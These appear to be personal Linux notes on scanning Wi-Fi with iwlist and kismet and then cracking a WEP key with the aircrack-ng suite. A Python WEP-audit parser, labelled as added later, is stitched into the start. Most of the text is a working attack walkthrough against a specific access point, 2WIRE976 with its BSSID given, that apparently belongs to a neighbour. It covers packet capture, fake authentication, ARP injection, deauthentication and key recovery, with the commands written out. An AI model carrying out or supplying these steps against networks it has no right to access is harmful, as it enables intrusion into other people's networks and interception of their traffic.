Need To See What’s In The Radio Spectrum

Try something like this.

sudo iwlist scan
sudo iwlist wlan0 scan | grep '\(ESSID\|Quality\|Address\)'

I think it’s part of the iw package in Ubuntu.
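As an added example (not from the original notes), a small Python parser for the iwlist scan output above that goes one step past the grep line: it groups the output into cells and labels each network as open, WEP, WPA or WPA2, so you can audit which of your own access points still run WEP. The sample scan text is constructed here, reusing the 2WIRE976 cell from these notes plus a made-up WPA2 cell with a locally administered MAC.

```python
import re

# Constructed sample of `sudo iwlist wlan0 scan` output (not a real capture):
# cell 01 mirrors the WEP network 2WIRE976 from the notes, cell 02 is a made-up WPA2 net.
SAMPLE_SCAN = """\
wlan0     Scan completed :
          Cell 01 - Address: 00:25:3C:E0:C6:A1
                    Quality=20/70  Signal level=-90 dBm
                    Encryption key:on
                    ESSID:"2WIRE976"
          Cell 02 - Address: 02:00:00:00:00:01
                    Quality=55/70  Signal level=-55 dBm
                    Encryption key:on
                    ESSID:"homenet"
                    IE: IEEE 802.11i/WPA2 Version 1
"""
CELL_SPLIT = re.compile(r"Cell \d+ - Address: ")

def parse_iwlist(text):
    """Group iwlist output into one dict per cell: bssid, essid, quality, key, ies."""
    cells = []
    for block in CELL_SPLIT.split(text)[1:]:  # chunk 0 is the "Scan completed" header
        lines = [ln.strip() for ln in block.splitlines()]
        cell = {"bssid": lines[0], "essid": None, "quality": None, "key": False, "ies": []}
        for line in lines[1:]:
            if line.startswith("ESSID:"):
                cell["essid"] = line[6:].strip('"')
            elif line.startswith("Quality="):
                cell["quality"] = line.split()[0][8:]  # e.g. "20/70"
            elif line.startswith("Encryption key:"):
                cell["key"] = line.endswith(":on")
            elif line.startswith("IE:"):
                cell["ies"].append(line)  # WPA/WPA2 information elements, if any
        cells.append(cell)
    return cells

def classify(cell):
    """OPEN (no key), WEP (key on but no WPA/RSN element), WPA or WPA2."""
    if not cell["key"]:
        return "OPEN"
    ies = " ".join(cell["ies"])
    if "WPA2" in ies or "802.11i" in ies:
        return "WPA2"
    return "WPA" if "WPA" in ies else "WEP"

def weak_networks(text):
    """(essid, bssid, label) for every cell still running open or WEP."""
    return [(c["essid"], c["bssid"], classify(c))
            for c in parse_iwlist(text) if classify(c) in ("OPEN", "WEP")]
```

Pipe a real scan into it with `sudo iwlist wlan0 scan | python3 -c 'import sys, audit; print(audit.weak_networks(sys.stdin.read()))'` (module name assumed) to list the cells worth migrating off WEP.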

Installing Tools

A great text-based interactive real time wifi scanner:

sudo apt-get install kismet

Tools to… uh… recover forgotten wifi passwords.

sudo apt-get install aircrack-ng

Run this:

sudo airmon-ng

to find out what to put in your /etc/kismet/kismet.conf file.

Example 1 (eee):

wlan0    Atheros    ath5k - [phy0]

Then put this in the source= definition:

source=ath5k,wlan0,Atheros

Example 2 (X60s):

source=iwl3945,wlan0,Intel 3945ABG

Also set:

suiduser=xed

Then run

sudo kismet

Maybe you need to run kismet_server first? Not sure. It is client/server oriented.

Pick the candidate AP:

    SSID    : 2WIRE976
    Server  : localhost:2501
    BSSID   : 00:25:3C:E0:C6:A1
    Carrier : IEEE 802.11b
    Manuf   : Unknown
    Max Rate: 18.0
    BSS Time: 1213fd23181
    Max Seen: 2000 kbps
    First   : Fri Jun 11 21:40:25 2010
    Latest  : Fri Jun 11 21:40:38 2010
    Clients : 0
    Type    : Access Point (infrastructure)
    Info    :
    Channel : 8
    Privacy : Yes
    Encrypt : WEP
    Decryptd: No
    Beacon  : 25600 (26.214400 sec)
    Packets : 10
    Data    : 0
    LLC     : 10
    Crypt   : 0
    Weak    : 0
    Dupe IV : 0
    Data    : 0B
    Signal  :
    Power   : -92 (best -90)
    Noise   : -127 (best -127)
    IP Type : None detected
    Min Loc : N/A
    Max Loc : N/A
    Range   : N/A

Try capturing some packets:

$ sudo airodump-ng --bssid 00:25:3C:E0:C6:A1 --ivs -w vecinopackets --channel 8 wlan0

Try stimulating some packets to capture while capturing:

$ sudo aireplay-ng -1 0 -e 2WIRE976 -a 00:25:3C:E0:C6:A1 -h 00:DE:AD:BE:EF:01 wlan0

From the web site I’m referring to:

The one at the end lets Airodump know we only want to capture IVs. The filename can be anything you want, and will be saved in your home directory (or whatever directory you run the command from) as filename.ivs. Copy the bssid of the wireless network from the airodump window by selecting it and pressing Shift+Ctrl+C. Open up a new terminal window so we can run aireplay to start injecting packets so our data count goes up. We want the data column in airodump to reach between 100,000 and 400,000. The more packets we have, the faster aircrack can find the WEP key. If the WEP key is 128 bits, we may need up to 1,000,000 packets.

sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0

This should associate the network with the wireless connection. If it times out repeatedly, you need to be closer to the wireless router or change your interface rate by typing sudo iwconfig ath0 rate 1. Next we want to start injecting packets.

sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0

At first, it will only read packets, and say 0 ARP requests and 0 packets sent. Just wait a minute or two and it will start sending packets in large quantities. If it returns text that says it has been deauthorized, press Ctrl+C and run the command again. You can try to speed things up by entering this command:

sudo aireplay -0 ath0 -a BSSID ath0

Otherwise just sit back and wait. As soon as packets begin to be sent, the data field in Airodump should start flying. Wait until the desired number of packets have been received, then open a new terminal window and run aircrack.

sudo aircrack filename.ivs

After a minute, aircrack should return the WEP key. If it doesn’t, collect more packets.